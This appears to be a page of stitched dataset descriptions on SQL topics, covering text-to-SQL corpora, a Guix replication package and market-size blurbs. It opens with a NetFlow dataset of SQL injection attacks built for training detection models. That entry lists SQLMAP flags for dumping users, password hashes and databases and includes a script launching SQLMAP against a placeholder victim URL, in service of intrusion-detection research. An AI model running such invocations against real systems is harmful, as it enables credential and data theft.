License: Attribution 4.0 (CC BY 4.0) - https://creativecommons.org/licenses/by/4.0/
Introduction
This dataset contains SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are Union-query SQL injection and Blind SQL injection, performed with the SQLMAP tool.
NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The first dataset (D1) was collected to train the detection models; the second (D2) was collected using different attacks than those used in training, to test the models and ensure their generalization.
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
| Dataset | Aim | Samples | Benign-malicious traffic ratio |
|---------|----------|---------|--------------------------------|
| D1 | Training | 400,003 | 50% |
| D2 | Test | 57,239 | 50% |
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.
DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or after it has been active for 1,800 seconds (30 minutes).
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends them to a NetFlow data generation node (packets received from the Internet are handled in the same way).
The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.
The attacks were executed from 16 nodes, each launching SQLMAP with the parameters listed in the following table (an illustrative invocation is sketched after the table).
| Parameters | Description |
|------------|-------------|
| '--banner', '--current-user', '--current-db', '--hostname', '--is-dba', '--users', '--passwords', '--privileges', '--roles', '--dbs', '--tables', '--columns', '--schema', '--count', '--dump', '--comments' | Enumerate users, password hashes, privileges, roles, databases, tables and columns |
| --level=5 | Increase the probability of a false positive identification |
| --risk=3 | Increase the probability of extracting data |
| --random-agent | Select the User-Agent randomly |
| --batch | Never ask for user input, use the default behavior |
| --answers="follow=Y" | Predefine answers to yes |
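For concreteness, the sketch below shows how an attacking node might assemble this SQLMAP invocation. It is only an illustration of the parameters above; the target URL is a placeholder, not part of the dataset.

```python
import subprocess

# Illustrative sketch only: launching SQLMAP with the parameters listed above.
# The target URL is a placeholder, not taken from the dataset.
target = "http://victim.example/form.php?id=1"

enumeration_flags = [
    "--banner", "--current-user", "--current-db", "--hostname", "--is-dba",
    "--users", "--passwords", "--privileges", "--roles", "--dbs", "--tables",
    "--columns", "--schema", "--count", "--dump", "--comments",
]

cmd = [
    "sqlmap", "-u", target,
    *enumeration_flags,
    "--level=5",           # run a wider set of injection tests
    "--risk=3",            # allow more aggressive payloads
    "--random-agent",      # select the User-Agent randomly
    "--batch",             # never ask for user input, use default behaviour
    "--answers=follow=Y",  # predefine the "follow" answer as yes
]

subprocess.run(cmd, check=False)
```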
Every attacking node executed SQLIA against 200 victim nodes. The victim nodes deployed a web form vulnerable to Union-type injection attacks, connected to either a MySQL or a SQL Server database engine (50% of the victim nodes deployed MySQL and the other 50% deployed SQL Server).
The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.
However, for D2, Blind SQL injection attacks were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic-generating nodes and 140.30.20.1/24 for victim nodes.
For the MySQL server, MariaDB version 10.4.12 was used; the other engines were Microsoft SQL Server 2017 Express and PostgreSQL version 13.
License: Apache License, v2.0 - https://www.apache.org/licenses/LICENSE-2.0
synthetic_text_to_sql
gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:
105,851 records partitioned into 100,000 train and 5,851 test records ~23M total tokens, including ~12M SQL tokens Coverage across 100 distinct… See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.
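A minimal sketch of loading the dataset with the Hugging Face datasets library, assuming the library is installed and the splits are named train and test as described above:

```python
from datasets import load_dataset

# Load the published splits from the Hugging Face Hub.
ds = load_dataset("gretelai/synthetic_text_to_sql")
print(ds)              # expect ~100,000 train and 5,851 test records
print(ds["train"][0])  # inspect one synthetic Text-to-SQL sample
```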
License: Attribution 4.0 (CC BY 4.0) - https://creativecommons.org/licenses/by/4.0/
Blockchain data query: dune-sql-generate-large-series-sample
License: Apache License 2.0 - http://www.apache.org/licenses/LICENSE-2.0
This dataset contains 56,964 conversations between an AI assistant and a (fake, generated) "Human" in Dutch, specifically in the domain of programming (Stack Overflow). They are translations of Baize's machine-generated answers based on the Stack Overflow dataset.
Data Instances
{'id': 9, 'input': 'Het gesprek tussen de mens en de AI-assistent. ' '[|Human|] Ik heb wat hulp nodig met Spark SQL union en het ordenen ' 'van kolommen. ' '[|AI|] Natuurlijk, ik help je graag. Waar heb je specifiek hulp ' 'bij nodig? ' '[|Human|] Ik wil de output van een UNION-query ordenen op een ' 'kolom die niet aanwezig is in de SELECT-instructie. Is dat ' 'mogelijk? ' '[|AI|] Ja, het is mogelijk met Spark SQL. Je kunt de ordinale ' 'positie van de kolom in de ORDER BY-clausule gebruiken in plaats ' 'van de kolomnaam. Als je bijvoorbeeld wilt ordenen op de derde ' 'kolom in de SELECT-instructie, kun je ORDER BY 3 gebruiken. ' '[|Human|] Dat is nuttig. Kan ik ook een alias gebruiken in de ' 'ORDER BY-clausule? ' '[|AI|] Ja, je kunt een alias gebruiken in de ORDER BY-clausule. De ' 'alias moet worden gedefinieerd in de SELECT-instructie. Als je ' 'bijvoorbeeld de derde kolom als "col3" alias geeft, kun je ordenen ' 'met ORDER BY col3. ' '[|Human|] Oké, ik denk dat ik het begrijp. Kan ik dezelfde alias ' 'gebruiken voor kolommen uit beide tabellen in de UNION? ' '[|AI|] Nee, je kunt dezelfde alias niet gebruiken voor kolommen ' 'uit beide tabellen in de UNION. Elke tabel in de UNION moet een ' 'unieke alias hebben voor de kolommen. ' '[|Human|] ', 'topic': 'Spark SQL UNION - ORDER BY kolom niet in SELECT'},
Data Fields
id: the ID of the item. The following 82 IDs are not included because they could not be translated: [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992]
input: the machine-generated conversation between AI and "Human". Always starts with Het gesprek tussen de mens en de AI-assistent. and has at least one occurrence of both [|AI|] and [|Human|].
topic: the topic description
Dataset Creation
Both the conversations and the topics were translated with OpenAI's API for gpt-3.5-turbo, using max_tokens=1024 and temperature=0 as parameters.
The prompt template to translate the input is (where src_lang was English and tgt_lang Dutch):
CONVERSATION_TRANSLATION_PROMPT = """You are asked to translate a conversation between an AI assistant and a human from {src_lang} into {tgt_lang}.
Here are the requirements that you should adhere to:
1. maintain the format: the conversation consists of the AI (marked as [|AI|]) and the human ([|Human|]) talking in turns and responding to each other;
2. do not translate the speaker identifiers [|AI|] and [|Human|] but always copy them into the translation in appropriate places;
3. ensure accurate translation and keep the correctness of the conversation;
4. make sure that text is fluent to read and does not contain grammatical errors. Use standard {tgt_lang} without regional bias;
5. translate the human's text using informal, but standard, language;
6. make sure to avoid biases (such as gender bias, grammatical bias, social bias);
7. if the human asks to correct grammar mistakes or spelling mistakes then you have to generate a similar mistake in {tgt_lang}, and then also generate a corrected output version for the AI in {tgt_lang};
8. if the human asks to translate text from one to another language, then you only translate the human's question to {tgt_lang} but you keep the translation that the AI provides in the language that the human requested;
9. do not translate code fragments but copy them as they are. If there are English examples, variable names or definitions in code fragments, keep them in English.
Now translate the following conversation with the requirements set out above. Do not provide an explanation and do not add anything else.
"""
The prompt to translate the topic is:
TOPIC_TRANSLATION_PROMPT = "Translate the following title of a conversation from {src_lang} to {tgt_lang} in a succinct, summarizing manner. Translate accurately and formally. Do not provide any explanation about the translation and do not include the original title."
The system message was:
You are a helpful assistant that translates English to Dutch to the requirements that are given to you.
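A minimal sketch of how such a translation call could look with the current OpenAI Python client. The original scripts are not included here, so the wrapper function and the way the conversation is appended to the prompt are assumptions; the model name, max_tokens=1024, temperature=0, the system message, and CONVERSATION_TRANSLATION_PROMPT come from the description above.

```python
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

def translate_conversation(conversation: str, src_lang: str = "English", tgt_lang: str = "Dutch") -> str:
    # Hypothetical wrapper: combines the documented prompt template and system
    # message with the sampling parameters stated above.
    # CONVERSATION_TRANSLATION_PROMPT is the template string defined earlier.
    prompt = CONVERSATION_TRANSLATION_PROMPT.format(src_lang=src_lang, tgt_lang=tgt_lang)
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        max_tokens=1024,
        temperature=0,
        messages=[
            {"role": "system", "content": "You are a helpful assistant that translates English "
                                          "to Dutch to the requirements that are given to you."},
            {"role": "user", "content": prompt + "\n\n" + conversation},
        ],
    )
    return response.choices[0].message.content
```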
Note that 82 items (0.1%) were not successfully translated: the translation was missing the AI identifier [|AI|] and/or the human one [|Human|]. The IDs of these missing items are the 82 IDs listed above in the description of the id field.
The translation quality has not been verified. Use at your own risk!
Licensing Information
Licensing info for Stack Overflow Questions is listed as Apache 2.0. If you use the current dataset, you should also adhere to the original license.
This text was generated (either in part or in full) with GPT-3 (gpt-3.5-turbo), OpenAI’s large-scale language-generation model. Upon generating draft language, the author reviewed, edited, and revised the language to their own liking and takes ultimate responsibility for the content of this publication.
If you use this dataset, you must also follow the Sharing and Usage policies.
As clearly stated in their Terms of Use, specifically 2c.iii, "[you may not] use output from the Services to develop models that compete with OpenAI". That means that you cannot use this dataset to build models that are intended to commercially compete with OpenAI. As far as I am aware, that is a specific restriction that should serve as an addendum to the current license.
This dataset is also available on the Hugging Face hub with the same DOI and license. See that README for more info.
License: Other - https://choosealicense.com/licenses/other/
View the code: https://colab.research.google.com/drive/1rLk-mdsWsdxwQdYYJS24rAP9KABtbiqu?usp=sharing
Example:
{"messages": [
{"role": "system", "content": "You are a SQL expert assistant. Generate clear, efficient SQL queries based on user requests. Provide only the SQL query without any additional text or explanation."}
{"role": "user", "content": "What are the top 5 most popular genres of music in the database, based on the number of tracks… See the full description on the dataset page: https://huggingface.co/datasets/fknguedia/SQL-GENERATOR-DATASETS.
License: Attribution-NonCommercial-ShareAlike 4.0 (CC BY-NC-SA 4.0) - https://creativecommons.org/licenses/by-nc-sa/4.0/
This data covers the following SQL statements: CREATE DATABASE, USE, CREATE TABLE (INT, VARCHAR, DATE), DESCRIBE, ALTER TABLE (ADD, MODIFY, CHAR, VARCHAR, AFTER, RENAME COLUMN ... TO, DROP COLUMN, DROP), SHOW TABLES, RENAME TABLE ... TO, and DROP TABLE.
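As a rough illustration of the statement types listed above, the sketch below runs a subset of them against an in-memory SQLite database. SQLite is only a stand-in here (it has no CREATE DATABASE, USE, DESCRIBE, or MODIFY), so the dataset's own examples may target a different dialect such as MySQL.

```python
import sqlite3

# Illustrative only: a few of the DDL statements covered by the dataset,
# limited to what SQLite understands (RENAME/DROP COLUMN need SQLite >= 3.35).
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE employees (id INT, name VARCHAR(50), hired DATE);
    ALTER TABLE employees ADD COLUMN department VARCHAR(30);
    ALTER TABLE employees RENAME COLUMN department TO dept;
    ALTER TABLE employees DROP COLUMN dept;
    ALTER TABLE employees RENAME TO staff;
    DROP TABLE staff;
""")
```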
License: Attribution 4.0 (CC BY 4.0) - https://creativecommons.org/licenses/by/4.0/
Overview
This dataset builds from WikiSQL and Spider. There are 78,577 examples of natural language queries, SQL CREATE TABLE statements, and SQL queries answering the question using the CREATE statement as context. This dataset was built with text-to-SQL LLMs in mind, intending to prevent the hallucination of column and table names often seen when models are trained on text-to-SQL datasets. The CREATE TABLE statement can often be copied and pasted from different DBMSs and provides table names, column… See the full description on the dataset page: https://huggingface.co/datasets/b-mc2/sql-create-context.
According to our latest research, the global SQL Generation AI market size reached USD 1.42 billion in 2024, reflecting a robust expansion driven by the rapid adoption of artificial intelligence technologies in database management and analytics. The market is set to grow at a compelling CAGR of 27.6% from 2025 to 2033, with the total market size forecasted to reach USD 13.18 billion by 2033. This remarkable growth trajectory is primarily fueled by advancements in natural language processing, the increasing complexity of enterprise data environments, and the demand for automation in SQL query generation to enhance productivity and reduce operational costs.
The primary growth factors propelling the SQL Generation AI market revolve around the escalating need for data-driven decision-making and the democratization of data access across organizations. As enterprises generate and store vast amounts of data, the ability to quickly and accurately extract actionable insights becomes critical. SQL Generation AI solutions, leveraging advanced machine learning and natural language processing algorithms, enable non-technical users to generate complex SQL queries using simple natural language instructions. This not only reduces the dependency on specialized database administrators but also accelerates the pace of business intelligence and analytics initiatives. The proliferation of self-service analytics and the integration of AI-powered query generation into popular business intelligence platforms further amplify market growth, making it easier for organizations to unlock the value of their data assets.
Another significant driver is the ongoing digital transformation across various industries, which has led to the modernization of legacy IT infrastructures and the adoption of cloud-based data management solutions. Organizations are increasingly migrating their databases to the cloud to benefit from scalability, flexibility, and cost-efficiency. SQL Generation AI tools are being integrated with cloud data warehouses and analytics platforms, allowing for seamless query generation and real-time data analysis. This shift not only optimizes data workflows but also supports hybrid and multi-cloud strategies, enabling enterprises to manage and analyze data across diverse environments. The rising volume and diversity of data, coupled with the need for real-time insights, are compelling organizations to invest in AI-powered SQL generation to maintain a competitive edge.
Additionally, the COVID-19 pandemic has accelerated the adoption of digital technologies, including AI-driven SQL generation, as organizations seek to automate routine tasks and enhance operational resilience. The growing emphasis on remote work and distributed teams has highlighted the importance of intuitive data access and collaboration tools. SQL Generation AI solutions facilitate seamless collaboration between business users and data teams, bridging the gap between technical and non-technical stakeholders. This has led to increased demand across sectors such as BFSI, healthcare, retail, and manufacturing, where timely data insights are crucial for strategic decision-making. The market is also witnessing heightened interest from small and medium enterprises, which are leveraging AI-powered SQL generation to level the playing field with larger competitors.
Regionally, North America continues to dominate the SQL Generation AI market, accounting for the largest share in 2024, followed by Europe and Asia Pacific. The presence of major technology vendors, early adoption of AI and cloud technologies, and a strong focus on data-driven innovation contribute to North America's leadership position. Europe is witnessing rapid growth, driven by stringent data regulations and increasing investments in digital transformation initiatives. Meanwhile, Asia Pacific is emerging as a high-growth region, fueled by expanding IT infrastructure, a burgeoning startup ecosystem, and rising demand for advanced analytics solutions in countries such as China, India, and Japan. Latin America and the Middle East & Africa are also showing promising growth potential as organizations in these regions accelerate their digital journeys.
The SQL Generation AI market by component is broadly segmented into Software and Services. The software segment commands the majority market share, as organizations increasingly dep
License: Apache License, v2.0 - https://www.apache.org/licenses/LICENSE-2.0
This project involves analyzing and transforming data from a bike warehouse database using SQL. The goal is to clean, transform, and query the data to generate insights about products, employees, customers, sales, and trends.
The SAP Bikes Sales database contains various tables that represent business data for a bike warehouse, such as information on products, sales, employees, business partners, and more. This project focuses on cleaning and transforming data, optimizing database schema, and generating SQL queries to gain business insights.
1. **Data Cleaning & Transformation**:
   - Remove duplicate records from key tables.
   - Drop unnecessary columns and handle null values.
   - Populate new columns based on existing data.
   - Merge related tables to create new insights.
2. **Business Insights Queries**:
   - Top-selling Products: Identify products with the highest sales quantities and total revenue.
   - Sales Performance by Product Category: Analyze revenue and order counts by product category.
   - Employee Sales Performance: Track employees' contribution to sales volumes and revenue.
   - Customer Segmentation: Examine the number of orders placed by business partners and their total sales value.
   - Sales Trends: Analyze sales trends over time and calculate average order values.
- **Addresses Table**:
  - Checked for duplicate ADDRESSID values.
- **BusinessPartners Table**:
  - Handled duplicates and missing or incorrect data.
  - Dropped the unnecessary FAXNUMBER column because it was empty.
- **Employee Table**:
  - Dropped unnecessary columns.
  - Populated NAME_INITIALS based on the employee's first, middle, and last name initials.
  - Fixed column type issues.
- **Product Categories and Product Texts**:
  - Merged the ProductCategories and ProductCategoryText tables into a new CombinedProductCategories table for easier analysis.
- **Products Table**:
  - Dropped irrelevant columns such as WIDTH, DEPTH, HEIGHT, etc.
- **Sales Order Items Table**:
  - Fixed null values in GROSSAMOUNT and created a TOTALGROSSAMOUNT column to track sales volume (a minimal sketch of a few of these steps follows below).
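A minimal sketch of a couple of the cleaning steps above, expressed against a hypothetical local SQLite copy of the warehouse. The table and column names (Addresses, ADDRESSID, BusinessPartners, FAXNUMBER, SalesOrderItems, GROSSAMOUNT) follow the notes above, but the real project may use a different engine and SQL dialect.

```python
import sqlite3

conn = sqlite3.connect("bike_warehouse.db")  # hypothetical local copy of the data
cur = conn.cursor()

# 1. Check for duplicate ADDRESSID values in the Addresses table.
cur.execute("""
    SELECT ADDRESSID, COUNT(*) AS n
    FROM Addresses
    GROUP BY ADDRESSID
    HAVING COUNT(*) > 1
""")
print("duplicate address ids:", cur.fetchall())

# 2. Drop the empty FAXNUMBER column (DROP COLUMN needs SQLite >= 3.35).
cur.execute("ALTER TABLE BusinessPartners DROP COLUMN FAXNUMBER")

# 3. Fix null values in GROSSAMOUNT on the sales order items.
cur.execute("UPDATE SalesOrderItems SET GROSSAMOUNT = 0 WHERE GROSSAMOUNT IS NULL")

conn.commit()
```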
### 2. Database Diagram and Relationships
In addition to the data cleaning and analysis, a database diagram has been create...
License: CC0 1.0 Universal (Public Domain Dedication) - https://creativecommons.org/publicdomain/zero/1.0/
By Huggingface Hub [source]
A large crowd-sourced dataset for developing natural language interfaces for relational databases. WikiSQL is a dataset of 80654 hand-annotated examples of questions and SQL queries distributed across 24241 tables from Wikipedia.
For more datasets, click here.
This dataset can be used to develop natural language interfaces for relational databases. The data fields are the same across all splits, and each file contains the phase, question, table, and SQL query for every example.
- This dataset can be used to develop natural language interfaces for relational databases.
- This dataset can be used to develop a knowledge base of common SQL queries.
- This dataset can be used to generate a training set for a neural network that translates natural language into SQL queries
If you use this dataset in your research, please credit the original authors.
License
License: CC0 1.0 Universal (CC0 1.0) - Public Domain Dedication No Copyright - You can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information.
Files: train.csv, validation.csv, test.csv (all three share the same columns)

| Column name | Description |
|:------------|:------------|
| phase | The phase of the data collection. (String) |
| question | The question asked by the user. (String) |
| table | The table containing the data for the question. (String) |
| sql | The SQL query corresponding to the question. (String) |
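A minimal sketch of inspecting one of the splits with pandas, assuming local copies of the CSV files:

```python
import pandas as pd

# Load the training split and inspect the four documented columns.
train = pd.read_csv("train.csv")
print(train.columns.tolist())            # ['phase', 'question', 'table', 'sql']
print(train[["question", "sql"]].head())
```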
If you use this dataset in your research, please credit the original authors and Huggingface Hub.
License: Attribution-ShareAlike 3.0 (CC BY-SA 3.0) - https://creativecommons.org/licenses/by-sa/3.0/
sql-create-context-v2 Dataset
Overview
The sql-create-context-v2 dataset enhances the original dataset built from WikiSQL and Spider, focusing on text-to-SQL tasks with a special emphasis on reducing hallucination of column and table names. This version introduces a JSONL format for more efficient data processing and iteration, alongside a structured approach to representing SQL queries in the dataset entries.
Key Enhancements
Dataset Format: Transitioned to… See the full description on the dataset page: https://huggingface.co/datasets/ramachetan22/sql-create-context-v2.
License: Attribution 4.0 (CC BY 4.0) - https://creativecommons.org/licenses/by/4.0/
Replication package for the paper:
Ludovic Courtès, Timothy Sample, Simon Tournier, Stefano Zacchiroli. "Source Code Archiving to the Rescue of Reproducible Deployment." ACM REP'24, June 18-20, 2024, Rennes, France. https://doi.org/10.1145/3641525.3663622
Generating the paper
The paper can be generated using the following command:
guix time-machine -C channels.scm \
  -- shell -C -m manifest.scm \
  -- make
This uses GNU Guix to run make in the exact same computational environment used when preparing the paper. The computational environment is described by two files. The channels.scm file specifies the exact version of the Guix package collection to use. The manifest.scm file selects a subset of those packages to include in the environment.
It may be possible to generate the paper without Guix. To do so, you will need the following software (on top of a Unix-like environment):
GNU Make
SQLite 3
GNU AWK
Rubber
Graphviz
TeXLive
Structure
data/ contains the data examined in the paper
scripts/ contains dedicated code for the paper
logs/ contains logs generated during certain computations
Preservation of Guix
Some of the claims in the paper come from analyzing the Preservation of Guix (PoG) database as published on January 26, 2024. This database is the result of years of monitoring the extent to which the source code referenced by Guix packages is archived. This monitoring has been carried out by Timothy Sample who occasionally publishes reports on his personal website: https://ngyro.com/pog-reports/latest/. The database included in this package (data/pog.sql) was downloaded from https://ngyro.com/pog-reports/2024-01-26/pog.db and then exported to SQL format. In addition to the SQL file, the database schema is also included in this package as data/schema.sql.
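The SQL dump can be turned back into a queryable SQLite database without any of the Makefile tooling; a minimal sketch (not part of the replication package) is:

```python
import sqlite3

# Rebuild a local SQLite database from the dump shipped as data/pog.sql.
with open("data/pog.sql") as f:
    dump = f.read()

conn = sqlite3.connect("pog.db")
conn.executescript(dump)
conn.commit()

# Sanity check: list the tables defined by the schema (see data/schema.sql).
for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
    print(name)
```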
The database itself is largely the result of scripts, but also of manual adjustments (where necessary or convenient). The scripts are available at https://git.ngyro.com/preservation-of-guix/, which is preserved in the Software Heritage archive as well: https://archive.softwareheritage.org/swh:1:snp:efba3456a4aff0bc25b271e128aa8340ae2bc816;origin=https://git.ngyro.com/preservation-of-guix. These scripts rely on the availability of source code in certain locations on the Internet, and therefore will not yield exactly the same result when run again.
Analysis
Here is an overview of how we use the PoG database in the paper. The exact way it is queried to produce graphs and tables for the paper is laid out in the Makefile.
The pog-types.sql query gives the counts of each source type (e.g. “git” or “tar-gz”) for each commit covered by the database.
The pog-status.sql query gives the archival status of the sources by commit. For each commit, it produces a count of how many sources are stored in the Software Heritage archive, missing from it, or unknown if stored or missing. The pog-status-total.sql query does the same thing but over all sources without sorting them into individual commits.
The disarchive-ratio.sql query estimates the success rate of Disarchive disassembly.
Finally, the swhid-ratio.sql query gives the proportion of sources for which the PoG database has an SWHID.
Estimating missing sources
The Preservation of Guix database only covers sources from a sample of commits to the Guix repository. This greatly simplifies the process of collecting the sources at the risk of missing a few. We estimate how many are missed by searching Guix’s Git history for Nix-style base-32 hashes. The result of this search is compared to the hashes in the PoG database.
A naïve search of Git history results in an over estimate due to Guix’s branch development model. We find hashes that were never exposed to users of ‘guix pull’. To work around this, we also approximate the history of commits available to ‘guix pull’. We do this by scraping push events from the guix-commits mailing list archives (data/guix-commits.mbox). Unfortunately, those archives are not quite complete. Missing history is reconstructed in the data/missing-links.txt file.
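A rough sketch of the kind of search involved is shown below; it is not the paper's actual script. The 52-character length and the Nix base-32 alphabet (which omits e, o, t and u) are assumptions about the hash format, and the repository path is a placeholder.

```python
import re
import subprocess

GUIX_REPO = "/path/to/guix"  # placeholder: local clone of the Guix repository

# Candidate Nix-style base-32 sha256 hashes: 52 chars over an alphabet without e, o, t, u.
NIX_BASE32_HASH = re.compile(r"\b[0-9a-df-np-sv-z]{52}\b")

# Note: 'git log -p --all' over the full Guix history is very large; this is a
# sketch, not an efficient implementation.
log = subprocess.run(
    ["git", "-C", GUIX_REPO, "log", "-p", "--all"],
    capture_output=True, text=True, check=True,
).stdout

hashes = set(NIX_BASE32_HASH.findall(log))
print(f"{len(hashes)} candidate source hashes found in the Git history")
```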
This estimate requires a copy of the Guix Git repository (not included in this package). The repository can be obtained from GNU at https://git.savannah.gnu.org/git/guix.git or from the Software Heritage archive: https://archive.softwareheritage.org/swh:1:snp:9d7b8dcf5625c17e42d51357848baa226b70e4bb;origin=https://git.savannah.gnu.org/git/guix.git. Once obtained, its location must be specified in the Makefile.
To generate the estimate, use:
guix time-machine -C channels.scm \
  -- shell -C -m manifest.scm \
  -- make data/missing-sources.txt
If not using Guix, you will need additional software beyond what is used to generate the paper:
GNU Guile
GNU Bash
GNU Mailutils
GNU Parallel
Measuring link rot
In order to measure link rot, we ran Guix Scheme scripts, i.e., scripts that use Guix as a Scheme library. The scripts depend on the state of the world at the specific moment when they ran, so it is not possible to reproduce exactly the same outputs. However, their tendency over time should be very similar. To run them, you need an installation of Guix. For instance:
guix repl -q scripts/table-per-origin.scm
When running these scripts for the paper, we tracked their output and saved it inside the logs directory.
SQL In-Memory Database Market size was valued at USD 9.26 Billion in 2024 and is projected to reach USD 35.7 Billion by 2032, growing at a CAGR of 20.27% from 2026 to 2032.
SQL In-Memory Database Market Drivers
Demand for Real-Time Analytics and Processing: Businesses increasingly require real-time insights from their data to make faster and more informed decisions. SQL In-Memory databases excel at processing data much faster than traditional disk-based databases, enabling real-time analytics and operational dashboards.
Growth of Big Data and IoT Applications: The rise of Big Data and the Internet of Things (IoT) generates massive amounts of data that needs to be processed quickly. SQL In-Memory databases can handle these high-velocity data streams efficiently due to their in-memory architecture.
Improved Performance for Transaction Processing Systems (TPS): In-memory databases offer significantly faster query processing times compared to traditional databases. This translates to improved performance for transaction-intensive applications like online banking, e-commerce platforms, and stock trading systems.
Reduced Hardware Costs (in some cases): While implementing an in-memory database might require an initial investment in additional RAM, it can potentially reduce reliance on expensive high-performance storage solutions in specific scenarios.
Focus on User Experience and Application Responsiveness: In today's digital landscape, fast and responsive applications are crucial. SQL In-Memory databases contribute to a smoother user experience by enabling quicker data retrieval and transaction processing.
However, it's important to consider some factors that might influence market dynamics:
Limited Data Capacity: In-memory databases are typically limited by the amount of available RAM, making them less suitable for storing massive datasets compared to traditional disk-based solutions.
Higher Implementation Costs: Setting up and maintaining an in-memory database can be more expensive due to the additional RAM requirements compared to traditional databases.
Hybrid Solutions: Many organizations opt for hybrid database solutions that combine in-memory and disk-based storage, leveraging the strengths of both for different data sets and applications.
According to our latest research, the global SQL-Verified Generation market size reached USD 2.18 billion in 2024, driven by the increasing demand for data integrity, compliance, and advanced analytics across industries. The market is expected to grow at a robust CAGR of 13.5% from 2025 to 2033, reaching a projected value of USD 6.47 billion by 2033. This growth is primarily attributed to the surge in data-driven decision-making, the proliferation of digital transformation initiatives, and the rising regulatory requirements for data validation and security worldwide. As organizations continue to prioritize accurate, reliable, and compliant data operations, the adoption of SQL-Verified Generation solutions is set to accelerate steadily over the forecast period.
One of the primary growth factors propelling the SQL-Verified Generation market is the exponential increase in data volumes generated by enterprises across various sectors. As organizations collect and process vast amounts of structured and unstructured data, the need for robust SQL-based verification tools becomes critical to ensure data accuracy, consistency, and reliability. These solutions enable businesses to automate data validation processes, minimize human errors, and enhance the overall quality of business intelligence outputs. Furthermore, the integration of artificial intelligence and machine learning with SQL-Verified Generation platforms is enabling advanced analytics and real-time data validation, further amplifying market growth. The ongoing digital transformation across industries such as BFSI, healthcare, and retail is pushing organizations to invest in scalable and secure data management solutions, thereby fueling the demand for SQL-Verified Generation systems.
Another significant driver for market expansion is the stringent regulatory landscape governing data privacy, security, and compliance. With regulations such as GDPR, HIPAA, and CCPA becoming more rigorous, organizations are under increasing pressure to ensure that their data processing and storage practices are fully compliant. SQL-Verified Generation solutions play a vital role in automating compliance checks, auditing data flows, and providing transparent reporting mechanisms. These capabilities not only help organizations avoid hefty fines and reputational damage but also build trust with stakeholders and customers. The growing emphasis on data governance and risk management is prompting enterprises to adopt advanced SQL-Verified Generation tools that offer comprehensive compliance and auditing functionalities, thereby contributing to sustained market growth.
Technological advancements and the shift towards cloud-based infrastructures are also catalyzing the adoption of SQL-Verified Generation solutions. Cloud deployment offers unparalleled scalability, flexibility, and cost-effectiveness, making it an attractive option for organizations of all sizes. The increasing integration of SQL-Verified Generation tools with cloud-based platforms and enterprise resource planning (ERP) systems is streamlining data integration, validation, and reporting processes. This seamless integration is not only enhancing operational efficiency but also enabling organizations to leverage real-time insights for strategic decision-making. As cloud adoption continues to rise, especially among small and medium enterprises, the market for SQL-Verified Generation solutions is poised for significant expansion in the coming years.
From a regional perspective, North America and Europe are currently leading the SQL-Verified Generation market, driven by the presence of major technology providers, high digital adoption rates, and strict regulatory frameworks. However, the Asia Pacific region is emerging as a lucrative market, fueled by rapid digitalization, increasing investments in IT infrastructure, and a growing focus on data-driven business strategies. Countries such as China, India, and Japan are witnessing substantial growth in sectors like BFSI, healthcare, and e-commerce, which is boosting the demand for advanced data validation and compliance solutions. As organizations in emerging economies continue to embrace digital transformation, the SQL-Verified Generation market is expected to witness robust growth across all major regions.
According to our latest research, the global in-vehicle SQL query engine market size reached USD 1.29 billion in 2024, with a robust year-on-year growth trajectory. The market is projected to expand at a CAGR of 14.7% from 2025 to 2033, reaching an estimated USD 4.14 billion by 2033. This impressive growth is primarily driven by the automotive sector’s increasing adoption of real-time data management and analytics solutions, which are critical for modern connected vehicles and advanced driver-assistance systems. As per our latest research, the demand for in-vehicle SQL query engines is being propelled by the integration of advanced infotainment, safety, and telematics features that require seamless, high-speed data querying capabilities within vehicle architectures.
